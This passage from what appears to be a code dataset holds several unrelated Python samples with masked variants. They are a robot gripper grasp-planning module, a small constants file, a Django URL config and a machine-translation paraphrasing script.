rotation_interval=math.radians(22.5),
max_samples=100,
min_dist_between_sampled_contact_points=.005,
contact_offset=.002):
"""
:param objcm:
:param hnd_s:
:param angle_between_contact_normals:
:param openning_direction: 'loc_x' or 'loc_y' depending on gripper types
    :param rotation_interval:
:param max_samples:
:param min_dist_between_sampled_contact_points:
    :param contact_offset: offset at the contact to avoid being too close to the object surface
    :return: a list [[jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos, hnd_rotmat], ...]
"""
contact_pairs = plan_contact_pairs(objcm,
max_samples=max_samples,
min_dist_between_sampled_contact_points=min_dist_between_sampled_contact_points,
angle_between_contact_normals=angle_between_contact_normals)
grasp_info_list = []
import modeling.geometric_model as gm
for i, cp in enumerate(contact_pairs):
print(f"{i} of {len(contact_pairs)} done!")
contact_p0, contact_n0 = cp[0]
contact_p1, contact_n1 = cp[1]
contact_center = (contact_p0 + contact_p1) / 2
jaw_width = np.linalg.norm(contact_p0 - contact_p1) + contact_offset * 2
if jaw_width > hnd_s.jawwidth_rng[1]:
continue
if openning_direction == 'loc_x':
jaw_center_x = contact_n0
jaw_center_z = rm.orthogonal_vector(contact_n0)
jaw_center_y = np.cross(jaw_center_z, jaw_center_x)
elif openning_direction == 'loc_y':
jaw_center_y = contact_n0
jaw_center_z = rm.orthogonal_vector(contact_n0)
else:
            raise ValueError("Opening direction must be loc_x or loc_y!")
grasp_info_list += gu.define_grasp_with_rotation(hnd_s,
objcm,
gl_jaw_center_pos=contact_center,
gl_jaw_center_z=jaw_center_z,
gl_jaw_center_y=jaw_center_y,
jaw_width=jaw_width,
gl_rotation_ax=contact_n0,
rotation_interval=rotation_interval,
toggle_flip=True)
return grasp_info_list
def write_pickle_file(objcm_name, grasp_info_list, root=None, file_name='preannotated_grasps.pickle', append=False):
if root is None:
root = './'
gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=file_name, append=append)
def load_pickle_file(objcm_name, root=None, file_name='preannotated_grasps.pickle'):
if root is None:
root = './'
return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)
if __name__ == '__main__':
import os
import basis
import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag
import modeling.collision_model as cm
import visualization.panda.world as wd
base = wd.World(cam_pos=[.5, .5, .3], lookat_pos=[0, 0, 0])
gripper_s = xag.XArmGripper(enable_cc=True)
objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')
objcm = cm.CollisionModel(objpath)
objcm.attach_to(base)
objcm.show_localframe()
grasp_info_list = plan_grasps(gripper_s, objcm, min_dist_between_sampled_contact_points=.02)
for grasp_info in grasp_info_list:
jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos, hnd_rotmat = grasp_info
gic = gripper_s.copy()
gic.fix_to(hnd_pos, hnd_rotmat)
gic.jaw_to(jaw_width)
print(hnd_pos, hnd_rotmat)
gic.gen_meshmodel().attach_to(base)
base.run()
|
normal
|
{
"blob_id": "738e6d4d608aa977094420a432cbd8a05ea8a1b5",
"index": 4384,
"step-1": "<mask token>\n\n\ndef plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef plan_contact_pairs(objcm, max_samples=100,\n min_dist_between_sampled_contact_points=0.005,\n angle_between_contact_normals=math.radians(160), toggle_sampled_points=\n False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]:\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * \n 0.001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(\n angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1,\n min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1\n ) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [\n contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n 
gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef plan_contact_pairs(objcm, max_samples=100,\n min_dist_between_sampled_contact_points=0.005,\n angle_between_contact_normals=math.radians(160), toggle_sampled_points=\n False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]:\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * \n 0.001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(\n angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1,\n min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1\n ) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [\n contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n 
gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\nif __name__ == '__main__':\n import os\n import basis\n import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag\n import modeling.collision_model as cm\n import visualization.panda.world as wd\n base = wd.World(cam_pos=[0.5, 0.5, 0.3], lookat_pos=[0, 0, 0])\n gripper_s = xag.XArmGripper(enable_cc=True)\n objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')\n objcm = cm.CollisionModel(objpath)\n objcm.attach_to(base)\n objcm.show_localframe()\n grasp_info_list = plan_grasps(gripper_s, objcm,\n min_dist_between_sampled_contact_points=0.02)\n for grasp_info in grasp_info_list:\n (jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos,\n hnd_rotmat) = grasp_info\n gic = gripper_s.copy()\n gic.fix_to(hnd_pos, hnd_rotmat)\n gic.jaw_to(jaw_width)\n print(hnd_pos, hnd_rotmat)\n gic.gen_meshmodel().attach_to(base)\n base.run()\n",
"step-4": "import math\nimport numpy as np\nimport basis.robot_math as rm\nimport grasping.annotation.utils as gu\nfrom scipy.spatial import cKDTree\n\n\ndef plan_contact_pairs(objcm, max_samples=100,\n min_dist_between_sampled_contact_points=0.005,\n angle_between_contact_normals=math.radians(160), toggle_sampled_points=\n False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]:\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * \n 0.001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(\n angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1,\n min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1\n ) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [\n contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n 
gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\nif __name__ == '__main__':\n import os\n import basis\n import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag\n import modeling.collision_model as cm\n import visualization.panda.world as wd\n base = wd.World(cam_pos=[0.5, 0.5, 0.3], lookat_pos=[0, 0, 0])\n gripper_s = xag.XArmGripper(enable_cc=True)\n objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')\n objcm = cm.CollisionModel(objpath)\n objcm.attach_to(base)\n objcm.show_localframe()\n grasp_info_list = plan_grasps(gripper_s, objcm,\n min_dist_between_sampled_contact_points=0.02)\n for grasp_info in grasp_info_list:\n (jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos,\n hnd_rotmat) = grasp_info\n gic = gripper_s.copy()\n gic.fix_to(hnd_pos, hnd_rotmat)\n gic.jaw_to(jaw_width)\n print(hnd_pos, hnd_rotmat)\n gic.gen_meshmodel().attach_to(base)\n base.run()\n",
"step-5": "import math\nimport numpy as np\nimport basis.robot_math as rm\nimport grasping.annotation.utils as gu\nfrom scipy.spatial import cKDTree\n\n\ndef plan_contact_pairs(objcm,\n max_samples=100,\n min_dist_between_sampled_contact_points=.005,\n angle_between_contact_normals=math.radians(160),\n toggle_sampled_points=False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]: # if the point was previous near to some points, ignore\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * .001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1, min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef plan_grasps(hnd_s,\n objcm,\n angle_between_contact_normals=math.radians(160),\n openning_direction = 'loc_x',\n rotation_interval=math.radians(22.5),\n max_samples=100,\n min_dist_between_sampled_contact_points=.005,\n contact_offset=.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm,\n max_samples=max_samples,\n min_dist_between_sampled_contact_points=min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f\"{i} of {len(contact_pairs)} done!\")\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError(\"Openning direction must be loc_x or loc_y!\")\n grasp_info_list += 
gu.define_grasp_with_rotation(hnd_s,\n objcm,\n gl_jaw_center_pos=contact_center,\n gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y,\n jaw_width=jaw_width,\n gl_rotation_ax=contact_n0,\n rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name='preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name='preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\nif __name__ == '__main__':\n import os\n import basis\n import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag\n import modeling.collision_model as cm\n import visualization.panda.world as wd\n\n base = wd.World(cam_pos=[.5, .5, .3], lookat_pos=[0, 0, 0])\n gripper_s = xag.XArmGripper(enable_cc=True)\n objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')\n objcm = cm.CollisionModel(objpath)\n objcm.attach_to(base)\n objcm.show_localframe()\n grasp_info_list = plan_grasps(gripper_s, objcm, min_dist_between_sampled_contact_points=.02)\n for grasp_info in grasp_info_list:\n jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos, hnd_rotmat = grasp_info\n gic = gripper_s.copy()\n gic.fix_to(hnd_pos, hnd_rotmat)\n gic.jaw_to(jaw_width)\n print(hnd_pos, hnd_rotmat)\n gic.gen_meshmodel().attach_to(base)\n base.run()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
ANCHO = 600
ALTO = 800
|
normal
|
{
"blob_id": "71ca67948100fb7ad388934740cead1ebe4a2b52",
"index": 8549,
"step-1": "<mask token>\n",
"step-2": "ANCHO = 600\nALTO = 800\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#coding: utf-8
from django.conf.urls import patterns, url
import views
urlpatterns = patterns('',
url(r'^douban/books$', views.BookList.as_view()),
)
|
normal
|
{
"blob_id": "93418e554893db4eb888396e8d6f60a8364d9ee3",
"index": 8560,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = patterns('', url('^douban/books$', views.BookList.as_view()))\n",
"step-3": "from django.conf.urls import patterns, url\nimport views\nurlpatterns = patterns('', url('^douban/books$', views.BookList.as_view()))\n",
"step-4": "#coding: utf-8\n\nfrom django.conf.urls import patterns, url\n\nimport views\n\nurlpatterns = patterns('',\n url(r'^douban/books$', views.BookList.as_view()),\n)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
# coding: utf-8
import sys
sys.path.insert(0, "/code/huggingface/transformers-fair-wmt/src")
import logging
logging.disable(logging.INFO) # disable INFO and DEBUG logger everywhere
from transformers.tokenization_fsmt import FSMTTokenizer
from transformers.modeling_fsmt import FSMTForConditionalGeneration
def translate(src, tgt, text):
# to switch to local model
    #mname = f"/code/huggingface/transformers-fair-wmt/data/wmt19-{src}-{tgt}"
# s3 uploaded model
mname = f"stas/wmt19-{src}-{tgt}"
tokenizer = FSMTTokenizer.from_pretrained(mname)
model = FSMTForConditionalGeneration.from_pretrained(mname)
encoded = tokenizer.encode(text, return_tensors='pt')
# print(encoded)
output = model.generate(encoded, num_beams=5, early_stopping=True)[0]
# print(output)
decoded = tokenizer.decode(output, skip_special_tokens=True)
#print(decoded)
return decoded
def paraphrase(src, tgt, text):
return translate(tgt, src, translate(src, tgt, text))
#text = """Here's a little song I wrote. You might want to sing it note for note. Don't worry, be happy. In every life we have some trouble. But when you worry you make it double. Don't worry, be happy. Don't worry, be happy now."""
text = "Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?"
en_ru = paraphrase('en', 'ru', text)
en_de = paraphrase('en', 'de', text)
# print together to avoid the logger noise :(
print("Paraphrasing:")
print(f"en : {text}")
print(f"en-ru-en: {en_ru}")
print(f"en-de-en: {en_de}")
# Paraphrasing:
# en : Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?
# en-ru-en: Every morning when I wake up, I have a delightful joy - the joy of being Salvador Dali - and I ask myself in delight: What wonderful things is this Salvador Dali going to do today?
# en-de-en: Every morning when I wake up, I experience an extraordinary joy - the joy of being Salvador Dalí - and I wonder with delight: what wonderful things will this Salvador Dalí do today?
|
normal
|
{
"blob_id": "7864138459caf469a0148420718b2282598141de",
"index": 6674,
"step-1": "<mask token>\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.insert(0, '/code/huggingface/transformers-fair-wmt/src')\n<mask token>\nlogging.disable(logging.INFO)\n<mask token>\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n\n<mask token>\nprint('Paraphrasing:')\nprint(f'en : {text}')\nprint(f'en-ru-en: {en_ru}')\nprint(f'en-de-en: {en_de}')\n",
"step-3": "<mask token>\nsys.path.insert(0, '/code/huggingface/transformers-fair-wmt/src')\n<mask token>\nlogging.disable(logging.INFO)\n<mask token>\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n\ntext = (\n 'Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?'\n )\nen_ru = paraphrase('en', 'ru', text)\nen_de = paraphrase('en', 'de', text)\nprint('Paraphrasing:')\nprint(f'en : {text}')\nprint(f'en-ru-en: {en_ru}')\nprint(f'en-de-en: {en_de}')\n",
